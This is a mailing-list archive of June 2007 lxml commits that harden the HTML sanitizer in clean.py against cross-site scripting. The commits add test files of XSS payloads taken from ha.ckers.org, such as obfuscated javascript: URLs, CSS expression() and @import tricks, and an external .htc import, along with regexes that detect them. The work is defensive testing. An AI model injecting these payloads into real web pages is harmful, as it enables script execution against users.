<a href="12345678901234567890123456789012345678901234567890">text</a>''')) + <a href="12345678901234567890123456789012345678901234567890">text</a> + + \ No newline at end of file From ianb at codespeak.net Fri Jun 1 22:43:28 2007 From: ianb at codespeak.net (ianb at codespeak.net) Date: Fri, 1 Jun 2007 22:43:28 +0200 (CEST) Subject: [Lxml-checkins] r43983 - lxml/branch/html/src/lxml/html Message-ID: <20070601204328.580968091@code0.codespeak.net> Author: ianb Date: Fri Jun 1 22:43:22 2007 New Revision: 43983 Modified: lxml/branch/html/src/lxml/html/clean.py Log: allow whitespace after expression () Modified: lxml/branch/html/src/lxml/html/clean.py ============================================================================== --- lxml/branch/html/src/lxml/html/clean.py (original) +++ lxml/branch/html/src/lxml/html/clean.py Fri Jun 1 22:43:22 2007 @@ -19,7 +19,7 @@ # This is an IE-specific construct you can have in a stylesheet to # run some Javascript: _css_javascript_re = re.compile( - r'expression\(.*?\)', re.S|re.I) + r'expression\s*\(.*?\)', re.S|re.I) # All kinds of schemes besides just javascript: that can cause # execution: From ianb at codespeak.net Sat Jun 2 02:43:06 2007 From: ianb at codespeak.net (ianb at codespeak.net) Date: Sat, 2 Jun 2007 02:43:06 +0200 (CEST) Subject: [Lxml-checkins] r43986 - lxml/branch/html/src/lxml Message-ID: <20070602004306.678778082@code0.codespeak.net> Author: ianb Date: Sat Jun 2 02:43:05 2007 New Revision: 43986 Modified: lxml/branch/html/src/lxml/doctestcompare.py Log: problem with displaying attributes that are missing in got Modified: lxml/branch/html/src/lxml/doctestcompare.py ============================================================================== --- lxml/branch/html/src/lxml/doctestcompare.py (original) +++ lxml/branch/html/src/lxml/doctestcompare.py Sat Jun 2 02:43:05 2007 @@ -292,7 +292,7 @@ text = self.format_text(value, False) attrs.append('%s="%s"' % (name, text)) if not any: - for name, value in 
sorted(got.attrib.items()): + for name, value in sorted(want.attrib.items()): if name in got.attrib: continue attrs.append('+%s="%s"' % (name, self.format_text(value, False))) From ianb at codespeak.net Sat Jun 2 03:36:37 2007 From: ianb at codespeak.net (ianb at codespeak.net) Date: Sat, 2 Jun 2007 03:36:37 +0200 (CEST) Subject: [Lxml-checkins] r43987 - lxml/branch/html/src/lxml/html Message-ID: <20070602013637.623FB8091@code0.codespeak.net> Author: ianb Date: Sat Jun 2 03:36:36 2007 New Revision: 43987 Modified: lxml/branch/html/src/lxml/html/defs.py Log: A couple new link attributes Modified: lxml/branch/html/src/lxml/html/defs.py ============================================================================== --- lxml/branch/html/src/lxml/html/defs.py (original) +++ lxml/branch/html/src/lxml/html/defs.py Sat Jun 2 03:36:36 2007 @@ -16,7 +16,10 @@ link_attrs = [ 'action', 'archive', 'background', 'cite', 'classid', 'codebase', 'data', 'href', 'longdesc', 'profile', 'src', - 'usemap'] + 'usemap', + # Not standard: + 'dynsrc', 'lowsrc', + ] # Not in the HTML 4 spec: # onerror, onresize From ianb at codespeak.net Sat Jun 2 03:37:12 2007 From: ianb at codespeak.net (ianb at codespeak.net) Date: Sat, 2 Jun 2007 03:37:12 +0200 (CEST) Subject: [Lxml-checkins] r43988 - lxml/branch/html/src/lxml/html Message-ID: <20070602013712.8890C8091@code0.codespeak.net> Author: ianb Date: Sat Jun 2 03:37:12 2007 New Revision: 43988 Modified: lxml/branch/html/src/lxml/html/__init__.py Log: Fix the parsing of fragments a bit, when there's just a single element that looks like a head element, and nothing that looks like a body element. 
Add a PI custom element Modified: lxml/branch/html/src/lxml/html/__init__.py ============================================================================== --- lxml/branch/html/src/lxml/html/__init__.py (original) +++ lxml/branch/html/src/lxml/html/__init__.py Sat Jun 2 03:37:12 2007 @@ -261,9 +261,12 @@ class HtmlElement(etree.ElementBase, HtmlMixin): pass +class HtmlProcessingInstruction(etree.PIBase, HtmlMixin): + pass + html_parser = etree.HTMLParser() html_parser.setElementClassLookup(etree.ElementDefaultClassLookup( - element=HtmlElement, comment=HtmlComment)) + element=HtmlElement, comment=HtmlComment, pi=HtmlProcessingInstruction)) def HTML(html): # FIXME: should this notice a fragment and parse accordingly? @@ -345,20 +348,23 @@ # otherwise, lets parse it out... doc = HTML(html) bodies = doc.findall('body') - body = bodies[0] - if len(bodies) > 1: - # Somehow there are multiple bodies, which is bad, but just - # smash them into one body - for other_body in bodies[1:]: - if other_body.text: - if len(body): - body[-1].tail = (body[-1].tail or '') + other_body.text - else: - body.text = (body.text or '') + other_body.text - body.extend(other_body) - # We'll ignore tail - # I guess we are ignoring attributes too - other_body.drop_element() + if bodies: + body = bodies[0] + if len(bodies) > 1: + # Somehow there are multiple bodies, which is bad, but just + # smash them into one body + for other_body in bodies[1:]: + if other_body.text: + if len(body): + body[-1].tail = (body[-1].tail or '') + other_body.text + else: + body.text = (body.text or '') + other_body.text + body.extend(other_body) + # We'll ignore tail + # I guess we are ignoring attributes too + other_body.drop_element() + else: + body = None heads = doc.findall('head') if heads: # Well, we have some sort of structure, so lets keep it all @@ -369,7 +375,6 @@ # We don't care about text or tail in a head other_head.drop_element() return doc - if (len(body) == 1 and (not body.text or not 
body.text.strip()) and (not body[-1].tail or not body[-1].tail.strip())): # The body has just one element, so it was probably a single From ianb at codespeak.net Sat Jun 2 03:38:49 2007 From: ianb at codespeak.net (ianb at codespeak.net) Date: Sat, 2 Jun 2007 03:38:49 +0200 (CEST) Subject: [Lxml-checkins] r43989 - in lxml/branch/html/src/lxml/html: . tests tests/hackers-org-data Message-ID: <20070602013849.E7BCD8091@code0.codespeak.net> Author: ianb Date: Sat Jun 2 03:38:49 2007 New Revision: 43989 Added: lxml/branch/html/src/lxml/html/tests/hackers-org-data/ lxml/branch/html/src/lxml/html/tests/hackers-org-data/background-image-plus.data lxml/branch/html/src/lxml/html/tests/hackers-org-data/background-image-with-unicoded.data lxml/branch/html/src/lxml/html/tests/hackers-org-data/downlevel-hidden.data lxml/branch/html/src/lxml/html/tests/hackers-org-data/html-plus-time.data lxml/branch/html/src/lxml/html/tests/hackers-org-data/javascript-link.data lxml/branch/html/src/lxml/html/tests/hackers-org-data/style-comment.data lxml/branch/html/src/lxml/html/tests/hackers-org-data/style-expression.data lxml/branch/html/src/lxml/html/tests/hackers-org-data/style-import.data lxml/branch/html/src/lxml/html/tests/hackers-org-data/style-js-tag.data lxml/branch/html/src/lxml/html/tests/hackers-org-data/style-url-js.data lxml/branch/html/src/lxml/html/tests/hackers-org-data/xml-data-island.data lxml/branch/html/src/lxml/html/tests/hackers-org-data/xml-embedded-js.data lxml/branch/html/src/lxml/html/tests/hackers-org-data/xml-namespace.data Modified: lxml/branch/html/src/lxml/html/clean.py lxml/branch/html/src/lxml/html/tests/test_feedparser_data.py Log: Fix a number of smaller XSS attacks Modified: lxml/branch/html/src/lxml/html/clean.py ============================================================================== --- lxml/branch/html/src/lxml/html/clean.py (original) +++ lxml/branch/html/src/lxml/html/clean.py Sat Jun 2 03:38:49 2007 @@ -15,17 +15,30 @@ # Some way to whitelist 
object, iframe, etc (e.g., if you want to # allow *just* embedded YouTube movies) # Log what was deleted and why? +# style="behavior: ..." might be bad in IE? +# Should we have something for just <meta http-equiv>? That's the worst of the +# metas. +# UTF-7 detections? Example: +# <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- +# you don't always have to have the charset set, if the page has no charset +# and there's UTF7-like code in it. + # This is an IE-specific construct you can have in a stylesheet to # run some Javascript: _css_javascript_re = re.compile( r'expression\s*\(.*?\)', re.S|re.I) +# Do I have to worry about @\nimport? +_css_import_re = re.compile( + r'@\s*import', re.I) + # All kinds of schemes besides just javascript: that can cause # execution: _javascript_scheme_re = re.compile( - r'\s*(?:javascript|jscript|livescript|vbscript|about):', re.I) + r'\s*(?:javascript|jscript|livescript|vbscript|about|mocha):', re.I) _whitespace_re = re.compile(r'\s+') +# FIXME: should data: be blocked? def clean_html(html, **kw): """ @@ -53,6 +66,7 @@ links=True, meta=True, page_structure=True, + processing_instructions=True, embedded=True, frames=True, forms=True, @@ -88,7 +102,10 @@ ``page_structure``: Structural parts of a page: ``<head>``, ``<html>``, ``<title>``. - Also xmlns attributes are removed with this. + + ``processing_instructions``: + Remove any processing instructions. Also xmlns attributes are + removed with this. ``embedded``: Remove any embedded objects (flash, iframes) @@ -154,21 +171,39 @@ for el in doc.xpath('descendant-or-self::*[@style]'): old = el.attrib['style'] new = _css_javascript_re.sub('', old) - if new != old: + new = _css_import_re.sub('', old) + if _has_sneaky_javascript(new): + # Something tricky is going on... 
+ del el.attrib['style'] + elif new != old: el.attrib['style'] = new for el in doc.xpath('descendant-or-self::style'): + if el.attrib.get('type', '').lower().strip() == 'text/javascript': + el.drop_element() + continue old = el.text or '' new = _css_javascript_re.sub('', old) - if new != old: + # The imported CSS can do anything; we just can't allow: + new = _css_import_re.sub('', old) + if _has_sneaky_javascript(new): + # Something tricky is going on... + el.text = '/* deleted */' + elif new != old: el.text = new - if comments: + if comments or processing_instructions: # Easier way? bad = [] for el in _itertree(doc): - if isinstance(el, etree._Comment): + if comments and isinstance(el, etree._Comment): + bad.append(el) + if processing_instructions and isinstance(el, etree._ProcessingInstruction): bad.append(el) for el in bad: el.drop_element() + if processing_instructions: + # FIXME: is this really the right place to remove these attributes? + for el in doc.xpath('descendant-or-self::*[@xmlns]'): + del el.attrib['xmlns'] if style: kill_tags.append('style') for el in doc.xpath('descendant-or-self::link[lower-case(@rel)="stylesheet"]'): @@ -177,13 +212,14 @@ del el.attrib['style'] if links: kill_tags.append('link') + elif javascript: + # FIXME: we should get rid of included stylesheets in this + # case, as you can put Javascript in them + pass if meta: kill_tags.append('meta') if page_structure: remove_tags.extend(['head', 'html', 'title']) - # FIXME: is this really the right place to remove these attributes? - for el in doc.xpath('descendant-or-self::*[@xmlns]'): - del el.attrib['xmlns'] if embedded: # FIXME: is <layer> really embedded? 
kill_tags.extend(['applet', 'param']) @@ -452,6 +488,16 @@ word = word[len(start):] result += word return result - - + +_decomment_re = re.compile(r'/\*.*?\*/', re.S) + +def _has_sneaky_javascript(style): + style = _decomment_re.sub('', style) + style = style.replace('\\', '') + style = _whitespace_re.sub('', style) + if 'javascript:' in style: + return True + if 'expression(' in style: + return True + return False Added: lxml/branch/html/src/lxml/html/tests/hackers-org-data/background-image-plus.data ============================================================================== --- (empty file) +++ lxml/branch/html/src/lxml/html/tests/hackers-org-data/background-image-plus.data Sat Jun 2 03:38:49 2007 @@ -0,0 +1,8 @@ +Description: I built a quick XSS fuzzer to detect any erroneous characters that are allowed after the open parenthesis but before the JavaScript directive in IE and Netscape 8.1 in secure site mode. These are in decimal but you can include hex and add padding of course. (Any of the following chars can be used: 1-32, 34, 39, 160, 8192-8.13, 12288, 65279) + http://ha.ckers.org/xss.html#XSS_DIV_background-image_plus +Options: -safe_attrs_only +Notes: As you see, the CSS gets corrupted, but I don't really care that much. + +<DIV STYLE="background-image: url(javascript:alert('XSS'))">text</div> +---------- +<div style="background-image: url(">text</div> Added: lxml/branch/html/src/lxml/html/tests/hackers-org-data/background-image-with-unicoded.data ============================================================================== --- (empty file) +++ lxml/branch/html/src/lxml/html/tests/hackers-org-data/background-image-with-unicoded.data Sat Jun 2 03:38:49 2007 @@ -0,0 +1,10 @@ +Description: exploit (this has been modified slightly to obfuscate the url parameter). The original vulnerability was found by Renaud Lifchitz as a vulnerability in Hotmail. 
+ http://ha.ckers.org/xss.html#XSS_DIV_background_image_unicode +Options: -safe_attrs_only +Ignore: true +Notes: I don't understand how this exploit works. It seems like the description actually refers to + the unicode you'd import, but why that matters I don't know. + +<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">text</div> +---------- +<div style="background-image: ">text</div> Added: lxml/branch/html/src/lxml/html/tests/hackers-org-data/downlevel-hidden.data ============================================================================== --- (empty file) +++ lxml/branch/html/src/lxml/html/tests/hackers-org-data/downlevel-hidden.data Sat Jun 2 03:38:49 2007 @@ -0,0 +1,11 @@ +Description: Downlevel-Hidden-Hidden block (only works in IE5.0 and later and Netscape 8.1 in IE rendering engine mode). Some websites consider anything inside a comment block to be safe and therefore does not need to be removed, which allows our Cross Site Scripting vector. Or the system could add comment tags around something to attempt to render it harmless. As we can see, that probably wouldn't do the job + http://ha.ckers.org/xss.html#XSS_Downlevel-Hidden +Options: -comments + +<div><!--[if gte IE 4]> +<SCRIPT>alert('XSS');</SCRIPT> +<![endif]--></div> +---------- +<div>[if gte IE 4]> +<SCRIPT>alert('XSS');</SCRIPT> +<![endif]</div> Added: lxml/branch/html/src/lxml/html/tests/hackers-org-data/html-plus-time.data ============================================================================== --- (empty file) +++ lxml/branch/html/src/lxml/html/tests/hackers-org-data/html-plus-time.data Sat Jun 2 03:38:49 2007 @@ -0,0 +1,12 @@ +Description: HTML+TIME in XML. This is how Grey Magic hacked Hotmail and Yahoo!. 
This only works in Internet Explorer and Netscape 8.1 in IE rendering engine mode and remember that you need to be between HTML and BODY tags for this to work + http://ha.ckers.org/xss.html#XSS_HTML_plus_time +Ignore: true +Notes: I don't understand the vector here, or how this is supposed to work. + +<div> +<t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>"> +</BODY></HTML></div> +---------- +<div> +<t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>"> +</BODY></HTML>x</div> Added: lxml/branch/html/src/lxml/html/tests/hackers-org-data/javascript-link.data ============================================================================== --- (empty file) +++ lxml/branch/html/src/lxml/html/tests/hackers-org-data/javascript-link.data Sat Jun 2 03:38:49 2007 @@ -0,0 +1,15 @@ +Description: javascript: in many forms + +<div> + <a href="java +script:alert()">x</a> + <a href="j a v a s c r i p t:alert()">x</a> + <a href="jscript +:alert()">x</a> +</div> +---------- +<div> + <a href="">x</a> + <a href="">x</a> + <a href="">x</a> +</div> Added: lxml/branch/html/src/lxml/html/tests/hackers-org-data/style-comment.data ============================================================================== --- (empty file) +++ lxml/branch/html/src/lxml/html/tests/hackers-org-data/style-comment.data Sat Jun 2 03:38:49 2007 @@ -0,0 +1,8 @@ +Description: to break up expression (Thanks to Roman Ivanov for this one) + http://ha.ckers.org/xss.html#XSS_STYLE_comment +Options: -safe_attrs_only +Notes: Because of the suspicious stuff in there, the style is removed entirely + +<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> +---------- +<img> Added: lxml/branch/html/src/lxml/html/tests/hackers-org-data/style-expression.data ============================================================================== --- (empty file) +++ lxml/branch/html/src/lxml/html/tests/hackers-org-data/style-expression.data Sat Jun 2 03:38:49 2007 @@ -0,0 +1,10 @@ 
+Description: (this is really a hybrid of the above XSS vectors, but it really does show how hard STYLE tags can be to parse apart, like above this can send IE into a loop) + http://ha.ckers.org/xss.html#XSS_IMG_STYLE_expression +Options: -safe_attrs_only +Notes: Modified to avoid a parsing in libxml2 that ruins the XSS (the " marks). + Also there seemed to be an extra "p" in exppression + +<div><img style="xss: ex/*<A STYLE='no\xss:noxss(*//*); +xss:ex/*XSS*//*/*/pression(alert('XSS'))"></div> +---------- +<div><img></div> Added: lxml/branch/html/src/lxml/html/tests/hackers-org-data/style-import.data ============================================================================== --- (empty file) +++ lxml/branch/html/src/lxml/html/tests/hackers-org-data/style-import.data Sat Jun 2 03:38:49 2007 @@ -0,0 +1,8 @@ +Description: tags with broken up JavaScript for XSS (this XSS at times sends IE into an infinite loop of alerts) + http://ha.ckers.org/xss.html#XSS_STYLE +Options: -safe_attrs_only + +<div><STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE></div> +---------- +<div><style>/* deleted */</style></div> + Added: lxml/branch/html/src/lxml/html/tests/hackers-org-data/style-js-tag.data ============================================================================== --- (empty file) +++ lxml/branch/html/src/lxml/html/tests/hackers-org-data/style-js-tag.data Sat Jun 2 03:38:49 2007 @@ -0,0 +1,7 @@ +Description: (Older versions of Netscape only) + http://ha.ckers.org/xss.html#XSS_STYLE_tag +Options: -safe_attrs_only + +<div><STYLE TYPE="text/javascript">alert('XSS');</STYLE></div> +---------- +<div></div> Added: lxml/branch/html/src/lxml/html/tests/hackers-org-data/style-url-js.data ============================================================================== --- (empty file) +++ lxml/branch/html/src/lxml/html/tests/hackers-org-data/style-url-js.data Sat Jun 2 03:38:49 2007 @@ -0,0 +1,8 @@ +Description: http://ha.ckers.org/xss.html#XSS_STYLE_background-image +Options: 
-style, -safe_attrs_only +Notes: The CSS is messed up here, but so it goes + +<div><STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A></div> +---------- +<div><style>.XSS{background-image:url()");}</style><a class="XSS"></a></div> + Added: lxml/branch/html/src/lxml/html/tests/hackers-org-data/xml-data-island.data ============================================================================== --- (empty file) +++ lxml/branch/html/src/lxml/html/tests/hackers-org-data/xml-data-island.data Sat Jun 2 03:38:49 2007 @@ -0,0 +1,10 @@ +Description: XML data island with comment obfuscation (this is another take on the same exploit that doesn't use CDATA fields, but rather uses comments to break up the javascript directive) + http://ha.ckers.org/xss.html#XSS_XML_data_island_comment +Ignore: true +Notes: I don't understand the vector here. Maybe datasrc should be filtered? + +<div><XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML> +<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN></div> +---------- +<div><XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML> +<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>x</div> Added: lxml/branch/html/src/lxml/html/tests/hackers-org-data/xml-embedded-js.data ============================================================================== --- (empty file) +++ lxml/branch/html/src/lxml/html/tests/hackers-org-data/xml-embedded-js.data Sat Jun 2 03:38:49 2007 @@ -0,0 +1,9 @@ +Description: Locally hosted XML with embedded JavaScript#XSS_Local_XML that is generated using an XML data island. This is the same as above but instead referrs to a locally hosted (must be on the same server) XML file that contains your cross site scripting vector. 
You can see the result here <http://ha.ckers.org/xssxmltest.html> + http://ha.ckers.org/xss.html#XSS_Local_XML + +<div><XML SRC="xsstest.xml" ID=I></XML> +<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></div> +---------- +<div> + <span></span> +</div> Added: lxml/branch/html/src/lxml/html/tests/hackers-org-data/xml-namespace.data ============================================================================== --- (empty file) +++ lxml/branch/html/src/lxml/html/tests/hackers-org-data/xml-namespace.data Sat Jun 2 03:38:49 2007 @@ -0,0 +1,16 @@ +Description: XML namespace. The htc file must be located on the same server as your XSS vector + http://ha.ckers.org/xss.html#XSS_XML_namespace +Note: I don't completely understand the vector here. page_structure is what does this. + +<HTML xmlns:xss> + <body> + <?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"> + <xss:xss>XSS</xss:xss> + </body> +</HTML> +---------- +<HTML> + <body> + <div>XSS</div> + </body> +</HTML> Modified: lxml/branch/html/src/lxml/html/tests/test_feedparser_data.py ============================================================================== --- lxml/branch/html/src/lxml/html/tests/test_feedparser_data.py (original) +++ lxml/branch/html/src/lxml/html/tests/test_feedparser_data.py Sat Jun 2 03:38:49 2007 @@ -8,7 +8,10 @@ from lxml.html import HTML, parse_element from lxml.html.clean import clean, clean_html -feed_dir = os.path.join(os.path.dirname(__file__), 'feedparser-data') +feed_dirs = [ + os.path.join(os.path.dirname(__file__), 'feedparser-data'), + os.path.join(os.path.dirname(__file__), 'hackers-org-data'), + ] bar_re = re.compile(r"-----+") class DummyInput: @@ -31,10 +34,10 @@ raise Exception( "File %s has no headers" % self.filename) self.description = headers['Description'] - self.expect = headers['Expect'] + self.expect = headers.get('Expect', '') self.ignore = headers.get('Ignore') self.options = [ - o.strip() for o in headers['Options'].split(',') + o.strip() for o 
in headers.get('Options', '').split(',') if o.strip()] parts = bar_re.split(c) self.input = parts[0].rstrip() + '\n' @@ -54,7 +57,10 @@ kw[name[1:]] = False else: kw[name] = True - transformed = clean_html(self.input, **kw) + if kw.get('clean', True): + transformed = clean_html(self.input, **kw) + else: + transformed = self.input assert self.expect is not None, ( "No expected output in %s" % self.filename) checker = LHTMLOutputChecker() @@ -70,14 +76,15 @@ def test_suite(): suite = unittest.TestSuite() - for fn in os.listdir(feed_dir): - fn = os.path.join(feed_dir, fn) - if fn.endswith('.data'): - case = FeedTestCase(fn) - suite.addTests([case]) - # This is my lazy way of stopping on first error: - try: - case.runTest() - except: - break + for dir in feed_dirs: + for fn in os.listdir(dir): + fn = os.path.join(dir, fn) + if fn.endswith('.data'): + case = FeedTestCase(fn) + suite.addTests([case]) + # This is my lazy way of stopping on first error: + try: + case.runTest() + except: + break return suite From scoder at codespeak.net Sun Jun 3 18:25:34 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Sun, 3 Jun 2007 18:25:34 +0200 (CEST) Subject: [Lxml-checkins] r44009 - lxml/trunk/doc Message-ID: <20070603162534.AE2808082@code0.codespeak.net> Author: scoder Date: Sun Jun 3 18:25:33 2007 New Revision: 44009 Modified: lxml/trunk/doc/FAQ.txt Log: FAQ: make clear that some crashes are due to libxml2 Modified: lxml/trunk/doc/FAQ.txt ============================================================================== --- lxml/trunk/doc/FAQ.txt (original) +++ lxml/trunk/doc/FAQ.txt Sun Jun 3 18:25:33 2007 @@ -258,7 +258,12 @@ b) If you are using threads, please see the following section to check if you touch on one of the potential pitfalls. -c) Otherwise, we would really like to hear about it. Please report it to the +c) Try to reproduce the problem with the latest versions of libxml2 and + libxslt. 
From time to time, bugs and race conditions are found in these + libraries, so a more recent version might already contain a fix for your + problem. + +d) Otherwise, we would really like to hear about it. Please report it to the `mailing list`_ so that we can fix it. It is very helpful in this case if you can come up with a short code snippet that demonstrates your problem. Please also report the version of lxml, libxml2 and libxslt that you are From scoder at codespeak.net Sun Jun 3 18:26:28 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Sun, 3 Jun 2007 18:26:28 +0200 (CEST) Subject: [Lxml-checkins] r44010 - lxml/trunk Message-ID: <20070603162628.3EDDD80AF@code0.codespeak.net> Author: scoder Date: Sun Jun 3 18:26:27 2007 New Revision: 44010 Modified: lxml/trunk/TODO.txt Log: 2.0 todo Modified: lxml/trunk/TODO.txt ============================================================================== --- lxml/trunk/TODO.txt (original) +++ lxml/trunk/TODO.txt Sun Jun 3 18:26:27 2007 @@ -70,3 +70,5 @@ * follow PEP 8 in API naming (avoidCamelCase in_favour_of_underscores) * clean support for entities (maybe an Entity element class?) + +* disable network access in parsers by default From scoder at codespeak.net Sun Jun 3 18:36:47 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Sun, 3 Jun 2007 18:36:47 +0200 (CEST) Subject: [Lxml-checkins] r44011 - lxml/branch/html/src/lxml/html Message-ID: <20070603163647.7CA8F80CE@code0.codespeak.net> Author: scoder Date: Sun Jun 3 18:36:47 2007 New Revision: 44011 Modified: lxml/branch/html/src/lxml/html/clean.py Log: better way to deal with comments and PIs Modified: lxml/branch/html/src/lxml/html/clean.py ============================================================================== --- lxml/branch/html/src/lxml/html/clean.py (original) +++ lxml/branch/html/src/lxml/html/clean.py Sun Jun 3 18:36:47 2007 @@ -61,7 +61,6 @@ scripts=True, javascript=True, comments=True, - # process instructions? 
style=False, links=True, meta=True, @@ -104,8 +103,7 @@ Structural parts of a page: ``<head>``, ``<html>``, ``<title>``. ``processing_instructions``: - Remove any processing instructions. Also xmlns attributes are - removed with this. + Remove any processing instructions. ``embedded``: Remove any embedded objects (flash, iframes) @@ -191,19 +189,14 @@ elif new != old: el.text = new if comments or processing_instructions: - # Easier way? - bad = [] - for el in _itertree(doc): - if comments and isinstance(el, etree._Comment): - bad.append(el) - if processing_instructions and isinstance(el, etree._ProcessingInstruction): - bad.append(el) - for el in bad: - el.drop_element() + kill_tags.append(etree.Comment) if processing_instructions: - # FIXME: is this really the right place to remove these attributes? - for el in doc.xpath('descendant-or-self::*[@xmlns]'): - del el.attrib['xmlns'] + kill_tags.append(etree.ProcessingInstruction) +## SB: Does this actually work? Definitely not the right place to do this. +# if processing_instructions: +# # FIXME: is this really the right place to remove these attributes? 
+# for el in doc.xpath('descendant-or-self::*[@xmlns]'): +# del el.attrib['xmlns'] if style: kill_tags.append('style') for el in doc.xpath('descendant-or-self::link[lower-case(@rel)="stylesheet"]'): From scoder at codespeak.net Mon Jun 4 11:13:16 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Mon, 4 Jun 2007 11:13:16 +0200 (CEST) Subject: [Lxml-checkins] r44015 - lxml/branch/html/src/lxml/html Message-ID: <20070604091316.9588E80B0@code0.codespeak.net> Author: scoder Date: Mon Jun 4 11:13:15 2007 New Revision: 44015 Modified: lxml/branch/html/src/lxml/html/clean.py Log: some cleanup Modified: lxml/branch/html/src/lxml/html/clean.py ============================================================================== --- lxml/branch/html/src/lxml/html/clean.py (original) +++ lxml/branch/html/src/lxml/html/clean.py Mon Jun 4 11:13:15 2007 @@ -151,32 +151,34 @@ kill_tags.append('script') if safe_attrs_only: safe_attrs = set(defs.safe_attrs) - for el in _itertree(doc): - for aname in el.attrib.keys(): + for el in doc.getiterator(): + attrib = el.attrib + for aname in attrib.keys(): if aname not in defs.safe_attrs: - del el.attrib[aname] + del attrib[aname] if javascript: if not safe_attrs_only: # safe_attrs handles events attributes itself - for el in _itertree(doc): - for aname in el.attrib.keys(): + for el in doc.getiterator(): + attrib = el.attrib + for aname in attrib.keys(): if aname.startswith('on'): - del el.attrib[aname] + del attrib[aname] doc.rewrite_links(_remove_javascript, resolve_base_href=False) if not style: # If we're deleting style then we don't have to remove JS links # from styles, otherwise... for el in doc.xpath('descendant-or-self::*[@style]'): - old = el.attrib['style'] + old = el.get('style') new = _css_javascript_re.sub('', old) new = _css_import_re.sub('', old) if _has_sneaky_javascript(new): # Something tricky is going on... 
del el.attrib['style'] elif new != old: - el.attrib['style'] = new + el.set('style', new) for el in doc.xpath('descendant-or-self::style'): - if el.attrib.get('type', '').lower().strip() == 'text/javascript': + if el.get('type', '').lower().strip() == 'text/javascript': el.drop_element() continue old = el.text or '' From ianb at codespeak.net Wed Jun 6 10:08:24 2007 From: ianb at codespeak.net (ianb at codespeak.net) Date: Wed, 6 Jun 2007 10:08:24 +0200 (CEST) Subject: [Lxml-checkins] r44048 - in lxml/branch/html/src/lxml: . html Message-ID: <20070606080824.557AE80C4@code0.codespeak.net> Author: ianb Date: Wed Jun 6 10:08:23 2007 New Revision: 44048 Modified: lxml/branch/html/src/lxml/doctestcompare.py lxml/branch/html/src/lxml/html/usedoctest.py lxml/branch/html/src/lxml/usedoctest.py Log: show comments properly. Remove the usedoctest modules after they are used, so they can be usefully reimported later. Modified: lxml/branch/html/src/lxml/doctestcompare.py ============================================================================== --- lxml/branch/html/src/lxml/doctestcompare.py (original) +++ lxml/branch/html/src/lxml/doctestcompare.py Wed Jun 6 10:08:23 2007 @@ -228,6 +228,9 @@ def format_tag(self, el): attrs = [] + if isinstance(el, etree.CommentBase): + # FIXME: probably PIs should be handled specially too? + return '<!--' for name, value in sorted(el.attrib.items()): attrs.append('%s="%s"' % (name, self.format_text(value, False))) if not attrs: @@ -235,6 +238,9 @@ return '<%s %s>' % (el.tag, ' '.join(attrs)) def format_end_tag(self, el): + if isinstance(el, etree.CommentBase): + # FIXME: probably PIs should be handled specially too? + return '-->' return '</%s>' % el.tag def collect_diff(self, want, got, html, indent): @@ -333,7 +339,7 @@ else: doctest.OutputChecker = LXMLOutputChecker -def temp_install(html=False): +def temp_install(html=False, del_module=None): """ Use this *inside* a doctest to enable this checker for this doctest only. 
@@ -364,16 +370,19 @@ # in check_output that we care about: doctest.etree = etree _RestoreChecker(dt_self, old_checker, checker, - check_func, checker.check_output.im_func) + check_func, checker.check_output.im_func, + del_module) class _RestoreChecker(object): - def __init__(self, dt_self, old_checker, new_checker, check_func, clone_func): + def __init__(self, dt_self, old_checker, new_checker, check_func, clone_func, + del_module): self.dt_self = dt_self self.checker = old_checker self.checker._temp_call_super_check_output = self.call_super self.checker._temp_override_self = new_checker self.check_func = check_func self.clone_func = clone_func + self.del_module = del_module self.install_clone() self.install_dt_self() def install_clone(self): @@ -387,12 +396,22 @@ self.dt_self._DocTestRunner__record_outcome = self def uninstall_dt_self(self): self.dt_self._DocTestRunner__record_outcome = self.prev_func + def uninstall_module(self): + if self.del_module: + import sys + del sys.modules[self.del_module] + if '.' 
in self.del_module: + package, module = self.del_module.rsplit('.', 1) + package_mod = sys.modules[package] + delattr(package_mod, module) def __call__(self, *args, **kw): self.uninstall_clone() self.uninstall_dt_self() del self.checker._temp_override_self del self.checker._temp_call_super_check_output - return self.prev_func(*args, **kw) + result = self.prev_func(*args, **kw) + self.uninstall_module() + return result def call_super(self, *args, **kw): self.uninstall_clone() try: Modified: lxml/branch/html/src/lxml/html/usedoctest.py ============================================================================== --- lxml/branch/html/src/lxml/html/usedoctest.py (original) +++ lxml/branch/html/src/lxml/html/usedoctest.py Wed Jun 6 10:08:23 2007 @@ -1,3 +1,3 @@ from lxml import doctestcompare -doctestcompare.temp_install(html=True) +doctestcompare.temp_install(html=True, del_module=__name__) Modified: lxml/branch/html/src/lxml/usedoctest.py ============================================================================== --- lxml/branch/html/src/lxml/usedoctest.py (original) +++ lxml/branch/html/src/lxml/usedoctest.py Wed Jun 6 10:08:23 2007 @@ -1,3 +1,3 @@ from lxml import doctestcompare -doctestcompare.temp_install() +doctestcompare.temp_install(del_module=__name__) From ianb at codespeak.net Wed Jun 6 10:10:04 2007 From: ianb at codespeak.net (ianb at codespeak.net) Date: Wed, 6 Jun 2007 10:10:04 +0200 (CEST) Subject: [Lxml-checkins] r44049 - lxml/branch/html/src/lxml/html Message-ID: 